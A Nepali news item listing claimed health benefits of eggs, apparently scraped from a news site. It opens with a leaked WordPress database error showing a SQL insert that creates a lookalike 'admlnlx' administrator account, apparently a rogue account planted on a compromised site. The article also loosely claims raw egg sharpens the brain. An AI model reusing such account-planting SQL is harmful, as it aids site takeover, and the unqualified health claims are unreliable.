WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BWg6Ft4oNFh08XMUXWlM54UYswFG7p1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-04 21:52:45', '', 'admlnlx', 'admlnlx')
अण्डा पौष्टिक तत्वले भरिपूर्ण हुन्छ । अण्डाका केही लाभ यस्ता छन्ः
–अण्डामा भिटामिन ए, डी, बी–१२ सँगै फस्फोरस, फोलेटलगायत तत्व पाइन्छन् । यी तत्वले शरीरलाई दह्रो राख्ने, दिमाग तेजिलो बनाउने र आँखाको ज्योति बढाउने गर्छ ।
–शरीरको वजन घटाउने सोचमा हुनुहुन्छ भने अण्डा तपाईंका लागि उपयोगी हुन सक्छ । एउटा अण्डामा ७० क्यालोरी र छ ग्राम प्रोटिन हुन्छ । त्यही भएर अण्डालाई कम क्यालोरी भएको खानाका रूपमा चिनिन्छ । भोक लागेको बेला अण्डा खानुभयो भने यसले शरीरमा क्यालोरीको मात्रा नबढाई तपाईंको भोक शान्त गराउँछ र शरीरलाई मोटाउन दिँदैन ।
–अण्डाको सेतो भागमा अल्ब्युमिन नामक प्रोटिन प्रशस्त मात्रामा पाइन्छ, जसले शरीरलाई ऊर्जावान राख्न मद्दत गर्छ । –अण्डामा क्याल्सियम, भिटामिन डी आदि पाइन्छन्, जसले हड्डीलाई बलियो बनाउने गर्छन् ।
–बिहान उठेपछि अल्छी लाग्यो भने भने अण्डा खाने गर्नुस् । यसले एनर्जी बुस्टरको काम गर्छ र तपाईंलाई जाँगरिलो बनाउँछ । – काँचो अण्डामा दिमाग तेजिलो बनाउने तत्व हुन्छ ।
– अण्डाको पहेँलो भागमा पाइने बायोटिन नामक तत्वले कपाल र छालालाई बलियो र चम्किलो बनाउँन मद्दत पुर्याउँछन् । खानुका साथै अण्डाको पहेँलो भागलाई कपालमा लगाउने गर्नाले कपाल नरम र चम्किलो बन्छ । – एजन्सी